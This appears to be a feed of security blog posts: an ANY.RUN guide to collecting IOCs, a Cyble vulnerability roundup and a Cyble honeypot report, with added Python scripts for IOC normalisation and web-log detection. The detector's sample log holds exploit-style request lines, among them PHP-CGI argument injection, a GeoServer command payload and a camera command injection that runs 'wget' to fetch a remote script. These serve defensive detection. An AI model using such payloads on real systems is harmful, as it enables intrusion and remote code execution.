Centralized IOC Window 

You can easily access all the important indicators in the IOC window. 

Simply hit the IOC button located in the top-right corner, and you’ll instantly gain access to the most critical IOCs collected throughout the analysis—whether they come from Static Analysis or Malware Configurations.  

IOC button in ANY.RUN sandbox session 

This window saves time and ensures that all critical data is conveniently organized in one place for easier review. 

IOCs window inside the ANY.RUN sandbox 

The IOC window is easy to navigate thanks to the simple dropdown menu.

Summary of IOCs with dropdown menu inside ANY.RUN’s sandbox 

You can quickly filter and organize IOCs. Plus, copying the selected indicators for your reports or further analysis is just a click away, making the whole process smooth and efficient. 
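Once the indicators have been copied out of the IOC window, they still have to be typed, de-duplicated and defanged before they go into a report or a blocklist. The script below is an added example written for this article; it is not ANY.RUN’s code and does not use the ANY.RUN API. It classifies raw indicators of the kinds described above (file hashes, DNS names, IP addresses, URLs), drops duplicates, derives the host behind every URL so it can be blocked on its own, and defangs the result. The sample list is constructed for the example, and the regexes and the refang/defang conventions are this example’s own assumptions.

```python
"""
Editor-added example, not ANY.RUN's code: normalise the raw indicators an
analyst copies out of a sandbox session (file hashes, DNS names, IPs, URLs)
into typed, de-duplicated, defanged rows ready for a report.  The sample list
is constructed for this example; the regexes and the refang/defang conventions
are assumptions of the example.
"""
import ipaddress
import re
from urllib.parse import urlsplit

HASH_RES = {
    "md5": re.compile(r"^[0-9a-f]{32}$", re.I),
    "sha1": re.compile(r"^[0-9a-f]{40}$", re.I),
    "sha256": re.compile(r"^[0-9a-f]{64}$", re.I),
}
# hostname: labels of letters/digits/hyphens, alphabetic TLD, <=253 chars total
DOMAIN_RE = re.compile(r"^(?=.{1,253}$)(?:[a-z0-9-]{1,63}\.)+[a-z]{2,63}$", re.I)


def refang(value: str) -> str:
    """Undo the usual defanging so 'hxxp://c2[.]example[.]net' parses normally."""
    v = value.strip()
    v = re.sub(r"^hxxp(s?)://", r"http\1://", v, flags=re.I)
    return v.replace("[.]", ".").replace("(.)", ".").replace("[:]", ":")


def classify(value: str) -> tuple:
    """Return (type, normalised value); type is md5/sha1/sha256/url/ip/domain/unknown."""
    v = refang(value)
    for kind, rx in HASH_RES.items():
        if rx.match(v):
            return kind, v.lower()
    if "://" in v:
        return "url", v
    try:
        ipaddress.ip_address(v)
        return "ip", v
    except ValueError:
        pass
    if DOMAIN_RE.match(v):
        return "domain", v.lower()
    return "unknown", v


def defang(kind: str, v: str) -> str:
    """Make the indicator non-clickable for reports; hashes are returned unchanged."""
    if kind == "url":
        netloc = urlsplit(v).netloc
        v = v.replace(netloc, netloc.replace(".", "[.]"), 1)
        return re.sub(r"^http", "hxxp", v, flags=re.I)
    if kind in ("ip", "domain"):
        return v.replace(".", "[.]")
    return v


def build_report(raw_iocs) -> tuple:
    """Return (rows, rejected): typed, de-duplicated rows plus inputs that
    classify as nothing useful (e.g. a stray label copied with the data)."""
    seen, rows, rejected = set(), [], []

    def add(kind, value, note):
        if (kind, value) in seen:
            return
        seen.add((kind, value))
        rows.append({"type": kind, "value": value,
                     "defanged": defang(kind, value), "note": note})

    for item in raw_iocs:
        kind, v = classify(item)
        if kind == "unknown":
            rejected.append(item)
            continue
        add(kind, v, "observed")
        if kind == "url":                      # the host is an IOC in its own right
            host = urlsplit(v).hostname
            if host:
                add(*classify(host), "derived from URL")
    return rows, rejected


# Constructed sample input (documentation domains and RFC 5737 addresses).
SAMPLE_IOCS = [
    "E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855",
    "d41d8cd98f00b204e9800998ecf8427e",
    "c2.example[.]net",
    "C2.EXAMPLE.NET",                       # same domain, different case/defanging
    "hxxps://paste.example.org/r/abc/0",
    "203.0.113.5",
    "203.0.113.5",                          # exact duplicate
    "not an ioc",                           # a label that slipped into the paste
]

if __name__ == "__main__":
    rows, rejected = build_report(SAMPLE_IOCS)
    for r in rows:
        print(f'{r["type"]:<7} {r["defanged"]:<45} {r["note"]}')
    print("rejected:", rejected)
```

The hash, IP and domain checks are ordered deliberately: a 32-hex-character string is tested as a hash before it could be mistaken for a hostname, and an address is tested with `ipaddress` before the domain regex so that `203.0.113.5` is never reported as a domain. Anything that classifies as nothing is returned separately rather than silently dropped, so an analyst can see what was left out of the report.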

About ANY.RUN  

ANY.RUN helps more than 400,000 cybersecurity professionals worldwide. Our interactive sandbox simplifies malware analysis of threats that target both Windows and Linux systems. Our threat intelligence products, TI Lookup, Yara Search and Feeds, help you find IOCs or files to learn more about the threats and respond to incidents faster.  

With ANY.RUN you can: 

Detect malware in seconds

Interact with samples in real time

Save time and money on sandbox setup and maintenance

Record and study all aspects of malware behavior

Collaborate with your team 

Scale as you need

The post How to Collect Indicators of Compromise in the ANY.RUN Sandbox appeared first on ANY.RUN’s Cybersecurity Blog.

ANY.RUN’s Cybersecurity Blog – Read More

Weekly IT Vulnerability Report: Cyble Urges Fixes for Ivanti, GitLab and Microchip

Key Takeaways


Cyble threat intelligence researchers investigated 15 vulnerabilities this week and highlighted three of them for security teams to prioritize.

Cyble researchers also found seven vulnerability exploits discussed on the dark web and cybercrime forums, raising the risk that those flaws will be increasingly exploited.

Cyble recommends eight best practices for preventing and limiting cyberattacks and data breaches.

Overview

Cyble Research and Intelligence Labs (CRIL) researchers this week investigated 15 vulnerabilities of particular significance for IT teams, and identified three that merit high-priority patching.

Cyble’s Sept. 18-24 Weekly Vulnerability Insights Report for subscribers also examined seven exploits circulating on the dark web and cybercrime forums, elevating the importance of addressing those flaws too.

Cyble also highlighted eight cybersecurity best practices that all organizations should follow to reduce the risk of cyberattacks and contain any that do occur.

The full report is available for subscribers; here we’ll focus on the most critical risks.

The Top IT Vulnerabilities This Week

The three vulnerabilities highlighted in the report include:

CVE-2024-8963, a critical admin bypass vulnerability in Ivanti Cloud Services Appliance (CSA), a security-focused appliance designed to facilitate secure communication and device management. Ivanti recently disclosed that attackers can chain CVE-2024-8963 with CVE-2024-8190 to bypass admin authentication and execute arbitrary commands on unpatched appliances. This vulnerability is also being discussed on the dark web (see below). A patch is available. Cyble researchers also issued a separate advisory on a vulnerability (CVE-2024-7593) in Ivanti’s Virtual Traffic Manager (vTM).

CVE-2024-45409, a critical SAML authentication bypass vulnerability impacting self-managed installations of GitLab Community Edition (CE) and Enterprise Edition (EE). Security Assertion Markup Language (SAML) is a single sign-on (SSO) protocol that lets users log in across different services with the same identity-provider (IdP) credentials. An unauthenticated attacker who holds any SAML document signed by the IdP can forge a SAML Response/Assertion with arbitrary contents, which lets the attacker log in as any user on the vulnerable instance. The disclosure follows several other recent GitLab vulnerabilities.

Internet Exposure? No

Patch Available? Yes

CVE-2024-7490, a critical improper input validation vulnerability in the Microchip Technology Advanced Software Framework (ASF), a library for microcontrollers that supports evaluation, prototyping, design, and production. The flaw is a buffer overflow in the tinydhcp server component (the tinydhcpserver.C source file, in the lwip_dhcp_find_option routine) that is triggered when it processes a crafted DHCP request, and it can lead to remote code execution.

Internet Exposure? No

Patch Available? Yes

Vulnerabilities and Exploits on Underground Forums

CRIL researchers observed multiple Telegram channels where the channel administrator shared or discussed exploits weaponizing vulnerabilities, including:

CVE-2024-8190: A high-severity OS command injection vulnerability in Ivanti Cloud Services Appliance 4.6 Patch 518 and earlier. It allows an attacker with admin-level access to execute arbitrary commands on the appliance, potentially leading to complete system compromise; chained with the CVE-2024-8963 admin bypass above, the admin-access requirement falls away.

CVE-2024-36837: A high-severity SQL injection vulnerability present in CRMEB version 5.2.2. This vulnerability allows remote attackers to gain unauthorized access to sensitive information.

CVE-2024-46740: A high severity Use-After-Free (UAF) vulnerability in the Linux Kernel. It is specifically related to the binder subsystem.

CVE-2024-20439: A critical security vulnerability affecting the Cisco Smart Licensing Utility, which could allow unauthenticated, remote attackers to gain administrative access to the system.

CVE-2024-8956: A critical improper authentication vulnerability in PTZOptics’ PT30X-SDI and PT30X-NDI cameras running firmware versions prior to 6.3.40.

CVE-1999-1587: A vulnerability in the ‘/usr/ucb/ps’ command in Sun Microsystems’ Solaris OS, affecting Solaris 8 and 9 as well as a few older versions. It allows local users to pass certain parameters to the command to view environment details of processes on the system.

CVE-2024-23692: CRIL observed multiple administrators of Telegram channels and a Threat Actor sharing a proof of concept (PoC) for a critical command injection vulnerability affecting the Rejetto HTTP File Server (HFS), specifically versions up to 2.3m. The vulnerability allows remote, unauthenticated attackers to execute arbitrary commands by sending specially crafted HTTP requests to the server.

Cyble Recommendations

To protect against these vulnerabilities and exploits, organizations should implement the following best practices:

1. Implement the Latest Patches

To mitigate vulnerabilities and protect against exploits, regularly update all software and hardware systems with the latest patches from official vendors.

2. Implement a Robust Patch Management Process

Develop a comprehensive patch management strategy that includes inventory management, patch assessment, testing, deployment, and verification. Automate the process where possible to ensure consistency and efficiency.

3. Implement Proper Network Segmentation

Divide your network into distinct segments to isolate critical assets from less secure areas. Use firewalls, VLANs, and access controls to limit access and reduce the attack surface exposed to potential threats.

4. Incident Response and Recovery Plan

Create and maintain an incident response plan that outlines procedures for detecting, responding to, and recovering from security incidents. Regularly test and update the plan to ensure its effectiveness and alignment with current threats.

5. Monitoring and Logging Malicious Activities

Implement comprehensive monitoring and logging solutions to detect and analyze suspicious activities. Use SIEM (Security Information and Event Management) systems to aggregate and correlate logs for real-time threat detection and response.

6. Keep Track of Security Alerts

Subscribe to security advisories and alerts from official vendors, CERTs, and other authoritative sources. Regularly review and assess the impact of these alerts on your systems and take appropriate actions.

7. Visibility into Assets

Maintain an up-to-date inventory of all internal and external assets, including hardware, software, and network components. Use asset management tools and continuous monitoring to ensure comprehensive visibility and control over your IT environment.

8. Strong Password Policy

Change default passwords immediately and enforce a strong password policy across the organization. Implement multi-factor authentication (MFA) to provide an extra layer of security and significantly reduce the risk of unauthorized access.

The post Weekly IT Vulnerability Report: Cyble Urges Fixes for Ivanti, GitLab and Microchip appeared first on Cyble.

Blog – Cyble – Read More

Cyble Honeypot Sensors Detect WordPress Plugin Attack, New Banking Trojan

Key Takeaways


Cyble’s Threat Hunting Honeypot sensors detected five recent vulnerabilities under active exploitation, including newly identified attacks against WordPress plugins.

A new banking trojan is engaged in active attacks in Europe and is expected to spread to other regions.

Of more than 400 identified scam email addresses discovered, six in particular stand out.

Commonly targeted ports have been identified and should be blocked by security teams.

Overview

Cyble’s Threat Hunting service this week discovered multiple instances of exploit attempts, malware intrusions, financial fraud, and brute-force attacks via its network of Honeypot sensors.

In the week of Sept. 18-24, Cyble researchers identified five recent active exploits, including new attacks against WordPress plugins, a new malware variant targeting the banking industry, more than 400 new spam email addresses, and thousands of brute-force attacks.

Vulnerability Exploits

Cyble sensors detected five recent vulnerabilities under active exploitation, in addition to a number of older vulnerabilities being actively exploited:

Case 1: SQL Injection Attack

CVE-2024-27956 is a CVSS 9.9 SQL injection vulnerability (improper neutralization of special elements used in an SQL command) in the ValvePress Automatic WordPress plugin. It affects Automatic versions through 3.92.0.

Case 2: PHP CGI Argument Injection Vulnerability

CVE-2024-4577 is a 9.8-severity PHP vulnerability that impacts CGI configurations and has been under attack since it was announced in June. It enables attackers to execute arbitrary commands through specially crafted URL parameters. It affects PHP versions 8.1.* before 8.1.29; 8.2.* before 8.2.20; and 8.3.* before 8.3.8, when using Apache and PHP-CGI on Windows.

Case 3: GeoServer Vulnerability Allows Remote Code Execution via Unsafe XPath Evaluation

CVE-2024-36401 is a 9.8-severity RCE vulnerability in GeoServer versions prior to 2.23.6, 2.24.4, and 2.25.2. The flaw arises from the unsafe evaluation of OGC request parameters as XPath expressions, allowing unauthenticated users to execute arbitrary code on default installations. The issue affects all GeoServer instances due to improper handling of simple feature types. Patches are available, and a workaround involves removing the vulnerable gt-complex library, which may impact functionality.

Case 4: Network Command Injection Vulnerability Without Authentication

CVE-2024-7029 is an 8.7-severity AVTECH IP camera vulnerability that allows remote attackers to inject and execute commands over the network without requiring authentication. This critical flaw poses a significant risk, enabling unauthorized control over affected systems.

Case 5: SPIP porte_plume Plugin Arbitrary Code Execution Without Authentication

The porte_plume plugin used by SPIP before 4.30-alpha2, 4.2.13, and 4.1.16 is vulnerable to a 9.8-severity arbitrary code execution vulnerability (CVE-2024-7954). A remote and unauthenticated attacker can execute arbitrary PHP as the SPIP user by sending a crafted HTTP request.
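Each of the five cases above leaves a recognisable trace in web-server access logs, which is where most teams will first see these attempts. The script below is an added detection example written for this article; it is not Cyble’s code and not its Suricata rules. It scans constructed Combined Log Format lines for requests that resemble the publicly shared proof-of-concept traffic for each CVE. The request patterns are assumptions based on those public PoCs (the WP Automatic `inc/csv.php` endpoint, the `%AD` soft-hyphen trick of CVE-2024-4577, the `exec(java.lang.Runtime...)` XPath payload for GeoServer, shell metacharacters in the AVTECH `Factory.cgi` query, and the SPIP `porte_plume_previsu` action), so treat them as a starting point and confirm matches against the full request, since POST bodies are not recorded in access logs.

```python
"""
Detection example added by the editor; it is not Cyble's code or its Suricata
rules.  It scans web-server access logs for requests that look like the public
exploit traffic for the five CVEs listed above.  The log lines are constructed
for this example, and each request pattern is an assumption based on publicly
shared proof-of-concept requests, so treat the rules as a starting point and
confirm matches against the full request (bodies are not in access logs).
"""
import re
from collections import Counter
from urllib.parse import unquote

# (CVE, label, regex).  Regexes run over the URL-decoded request line.
RULES = [
    ("CVE-2024-27956", "WP Automatic plugin SQLi via inc/csv.php",
     re.compile(r"/wp-content/plugins/wp-automatic/inc/csv\.php", re.I)),
    ("CVE-2024-4577", "PHP-CGI argument injection (soft hyphen -> '-d')",
     # 0xAD (soft hyphen) is best-fit mapped to '-' by php-cgi on Windows,
     # so '%ADd' in the query becomes a '-d' php.ini override
     re.compile("\u00add", re.I)),
    ("CVE-2024-36401", "GeoServer XPath/OGC parameter code execution",
     re.compile(r"exec\s*\(\s*java\.lang\.Runtime", re.I)),
    ("CVE-2024-7029", "AVTECH Factory.cgi command injection",
     # assumption: shell metacharacters inside the Factory.cgi query string
     re.compile(r"/cgi-bin/supervisor/Factory\.cgi\?[^ ]*[;|`]", re.I)),
    ("CVE-2024-7954", "SPIP porte_plume previsu code execution",
     # assumption: the action targeted by public PoCs; payload is in the POST body
     re.compile(r"action=porte_plume_previsu", re.I)),
]

# Combined Log Format: ip ident user [time] "request" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3})')


def decode_request(req: str) -> str:
    """URL-decode with latin-1 so a lone %AD stays the single 0xAD character
    instead of being replaced with U+FFFD by a UTF-8 decode."""
    return unquote(req, encoding="latin-1")


def match_rules(req: str) -> list:
    """Return [(cve, label), ...] for every rule the request line matches."""
    text = decode_request(req)
    return [(cve, label) for cve, label, rx in RULES if rx.search(text)]


def triage(lines) -> list:
    """Return one dict per (log line, matched rule) pair; unparsable lines are skipped."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        for cve, label in match_rules(m["req"]):
            hits.append({"src": m["ip"], "time": m["ts"], "cve": cve,
                         "label": label, "status": int(m["status"]),
                         "request": m["req"]})
    return hits


def summarize(hits) -> Counter:
    """Count matched requests per CVE, regardless of source."""
    return Counter(h["cve"] for h in hits)


# Constructed sample log (RFC 5737 documentation addresses): one attempt per CVE
# plus two benign requests that must not trigger anything.
SAMPLE_LOG = [
    '203.0.113.10 - - [20/Sep/2024:10:01:02 +0000] "POST /wp-content/plugins/wp-automatic/inc/csv.php HTTP/1.1" 200 512',
    '203.0.113.11 - - [20/Sep/2024:10:02:15 +0000] "POST /php-cgi/php-cgi.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 200 100',
    '198.51.100.7 - - [20/Sep/2024:10:03:40 +0000] "GET /geoserver/wfs?service=WFS&version=2.0.0&request=GetPropertyValue&typeNames=sf:archsites&valueReference=exec(java.lang.Runtime.getRuntime(),%27id%27) HTTP/1.1" 400 0',
    '198.51.100.9 - - [20/Sep/2024:10:04:01 +0000] "GET /cgi-bin/supervisor/Factory.cgi?action=brightness&brightness=1;wget%20http://198.51.100.9/x.sh HTTP/1.1" 200 30',
    '192.0.2.44 - - [20/Sep/2024:10:05:12 +0000] "POST /index.php?action=porte_plume_previsu HTTP/1.1" 200 90',
    '192.0.2.5 - - [20/Sep/2024:10:06:00 +0000] "GET /index.php HTTP/1.1" 200 2048',
    '192.0.2.6 - - [20/Sep/2024:10:06:05 +0000] "GET /wp-content/plugins/wp-automatic/css/style.css HTTP/1.1" 200 300',
]

if __name__ == "__main__":
    found = triage(SAMPLE_LOG)
    for h in found:
        print(f'{h["src"]:<14} {h["cve"]:<15} {h["label"]}')
    print(summarize(found))
```

The one non-obvious choice is decoding the request with latin-1: the CVE-2024-4577 marker is a bare `%AD` byte, which a UTF-8 decode would turn into U+FFFD and the rule would never fire. A 200 status on a matched request (as in the constructed `csv.php` and `Factory.cgi` lines) is the signal to escalate; a 400 or 404 only shows that the attempt was made.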

Octo2: New Malware Variant Targets European Banks in Active Attacks

Octo2, a new variant of the Octo mobile banking trojan, was recently discovered in European bank attacks, and deployment in other global regions is expected to follow.

Octo (also known as ExobotCompact) has emerged as one of the most prominent malware families in the mobile threat landscape, leading in the number of unique samples detected this year. Recently, a new variant named “Octo2,” created by the original threat actor, has been discovered, signaling a potential shift in the actors’ tactics and strategies. This upgraded version enhances the malware’s remote action capabilities, particularly for Device Takeover attacks, ensuring greater stability in execution. New Octo2 campaigns have already been observed targeting several European countries. Additionally, Octo2 employs advanced obfuscation techniques to evade detection, including the introduction of a Domain Generation Algorithm (DGA), further bolstering its ability to remain hidden from security systems.

Here are the known hashes and IoCs, via ThreatFabric:

Hash (SHA-256) | App name | Package name
83eea636c3f04ff1b46963680eb4bac7177e77bbc40b0d3426f5cf66a0c647ae | NordVPN | com.handedfastee5
6cd0fbfb088a95b239e42d139e27354abeb08c6788b6083962943522a870cb98 | Europe Enterprise | com.xsusb_restore3
117aa133d19ea84a4de87128f16384ae0477f3ee9dd3e43037e102d7039c79d9 | Google Chrome | com.havirtual06numberresources

More Than 400 Scam Email Addresses Detected

Cyble identified 410 new email addresses used in scam campaigns. Six notable examples:

Email Subject | Scammer’s Email ID | Scam Type | Description
Claim Directives | info@szhualilian.com | Claim scam | Fake refund against claims
Dear winner! | info@student.htw-berlin.de | Lottery/prize scam | Fake prize winnings used to extort money or information
DONATION NOTICE | m.sharifi@qiau.ac.ir | Donation scam | Scammers posing as donors offering money
INVESTMENT PROPOSAL | Walsh.philip@natwest.co.uk | Investment scam | Unrealistic investment offers to steal funds or data
Order: cleared customs | support@ip.linodeusercontent.com | Shipping scam | Unclaimed-shipment trick used to demand fees or details
UN Compensation Fund | info@usa.com | Government organization scam | Fake UN compensation used to collect financial details

Brute-Force Attack Ports Identified

Of the thousands of brute-force attacks Cyble identified, the following targeted ports stand out.

Looking at the distribution of attacked ports for the top five attacker countries, Cyble observed that attacks originating from the United States targeted ports 22 (40%), 3389 (32%), 445 (21%), 23 (4%), and 80 (3%); attacks from Turkey targeted port 3389 exclusively (100%); and attacks from Russia, China, and Bulgaria mainly targeted ports 5900 and 445.

Security analysts are advised to block, or restrict to trusted source ranges, the attacked ports wherever the service does not need to be public (the report lists 22, 3389, 443, 445, 5900, and 3306). Remote administration and database services such as SSH, RDP, SMB, VNC, and MySQL should not be reachable from arbitrary internet addresses; a blanket block on a port that a business service legitimately uses (443 in particular) should be a deliberate decision rather than a default.

Cyble Recommendations

Cyble researchers recommend the following security controls:


Blocking target hashes, URLs, and email info on security systems (Cyble clients received a separate IoC list).

Immediately patch all open vulnerabilities listed here and routinely monitor the top Suricata alerts in internal networks.

Constantly check for Attackers’ ASNs and IPs.

Block Brute Force attack IPs and the targeted ports listed.

Immediately reset default usernames and passwords to mitigate brute-force attacks and enforce periodic changes.

For servers, set up strong passwords that are difficult to guess.

The post Cyble Honeypot Sensors Detect WordPress Plugin Attack, New Banking Trojan appeared first on Cyble.

Blog – Cyble – Read More

Gamaredon’s operations under the microscope – Week in security with Tony Anscombe

ESET research examines the group’s malicious wares as used to spy on targets in Ukraine in the past two years

WeLiveSecurity – Read More